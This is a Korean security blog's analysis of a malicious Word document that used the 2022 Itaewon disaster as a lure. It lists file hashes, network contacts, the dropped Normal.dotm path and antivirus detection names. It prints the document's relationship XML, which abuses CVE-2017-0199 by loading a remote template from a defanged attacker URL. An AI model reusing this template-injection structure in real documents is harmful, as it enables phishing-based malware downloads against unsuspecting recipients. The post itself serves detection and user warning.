꿈을꾸는 파랑새

오늘은 2022년 10월 29일 대한민국 서울특별시 용산구 이태원동 해밀톤호텔 서편에서 북편 5m 보폭의 작은 골목에 할로윈 축제를 즐기려다 안타까운 사고가 일어난 이태원 압사 사고를 악용한 워드 매크로 악성코드인 21031 ★서울 용산 이태원사고 대처상황(06시)에 대해 알아보겠습니다. 먼저 해당 사고 돌아가신 분들에게 삼가 고인의 명복을 빕니다
일단 해당 악성코드는 2022년 10월 31일 오후 7시쯤 발견된 악성코드이면 해당 CVE-2017-0199 악용한 매크로 악성코드입니다. 먼저 해당 악성코드를 분석하기에 앞서 일단 알약(ALYac), 시만텍(Symantec)비트디펜더(Bitdefender),ESET(이셋),아비라(Avira),Emsisoft(엠씨소프트),안랩 V3 등에 먼저 신고를 진행했습니다.
일단 해당 악성코드는 워드 형식으로 된 악성코드이면 먼저 해쉬값은 다음과 같습니다.
파일명:21031 ★서울 용산 이태원사고 대처상황(06시).docx
사이즈:135 KB
CRC32:2d4fb29b
MD5:476027afdbf18c18e076fff71a8ef588
SHA-1:986de6bc24a480f6d0ab631f21bd5f38d70490d9
SHA-256:926a947ea2b59d3e9a5a6875b4de2bd071b15260370f4da5e2a60ece3517a32f
SHA-512:2452a06909d600b4a2cbe9277e0cd505ed570790eb08a3f9e5bd781377e4643ea31233c5c660953b97ae522e42ffe52f2a27ab7c88edcb84edbaf34e1d162127

21031 ★서울 용산 이태원사고 대처상황(06시) 악성코드 내용
21031 ★서울 용산 이태원사고 대처상황(06시) 악성코드 내용

일단 해당 악성코드를 실행하면 용산구 이태원 사고 대처상황이라는 제목과 중앙재난안전대책본부이라는 식으로 돼 있으며 기본적으로 정부 공식 문서를 악용한 것 같습니다.
악성코드가 동작하기 위한 코드는 다음과 같은 경로에 삽입돼 있습니다.
21031 ★서울 용산 이태원사고 대처상황(06시)\word\_rels
해당 코드 내용은 다음과 같습니다.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats(.)org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats(.)org/officeDocument/2006/relationships/attachedTemplate" Target="https://ms-offices(.)com/templates-for-word/download?id=TYV6YAYWOPEKI61Y" TargetMode="External"/></Relationships>

그리고 해당 악성코드는 다음과 같이 동작을 합니다.

http://ctldl.windowsupdate(.)com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?168c8e68a620006e
http://ctldl.windowsupdate(.)com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5b28546cff9a7f3b
http://x1.c.lencr(.)org/
http://r3.o.lencr(.)org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgNKCGUOVkhMnF5o%2Ff4axkDrJg%3D%3D

악성코드가 생성한 파일
악성코드가 생성한 파일

이며 그리고 다음 폴더에 Normal.dotm 파일을 생성합니다.
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
등입니다.

워드에 포함된 악성코드 주소
워드에 포함된 악성코드 주소

일단 바이러스토탈(VirusTotal) 2022-10-31 16:45:06 UTC 기준으로 일단 앞서 악성코드 신고한 ALYac(알약),시만텍(Symantec)에서는 악성코드 데이터베이스에 등록되어서 탐지하고 있으면 지금은 탐지하는 보안 업체들은 다음과 같습니다.
ALYac:Trojan.Downloader.DOC.Gen
NANO-Antivirus:Exploit.Xml.CVE-2017-0199.equmby
Symantec:W97M.Downloader
Zoner:Probably Heur.W97OleLink
앞으로 이런 사고를 악용해서 악성코드가 유포될 것으로 추정되면 항상 백신 프로그램을 설치 실시간 업데이트 및 실시간 감시 그리고 사전 방역 시스템 등을 켜두고 컴퓨터를 사용하는 것이 좋으면 이런 이슈성 문서 등이 이메일 등으로 오면 그냥 무시하고 삭제를 하시고 그래도 나는 해당 문서를 보고 싶다고 하면 반드시 가상 환경인 VirtualBox(버추얼 박스),VMware 같은 환경에서 열어 보는 것이 안전하면 그냥 앞서 말한 것처럼 이런 이메일이 오면 그냥 삭제를 하시면 됩니다. 그리고 이태원 참사 희생자들의 명복을 빕니다

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band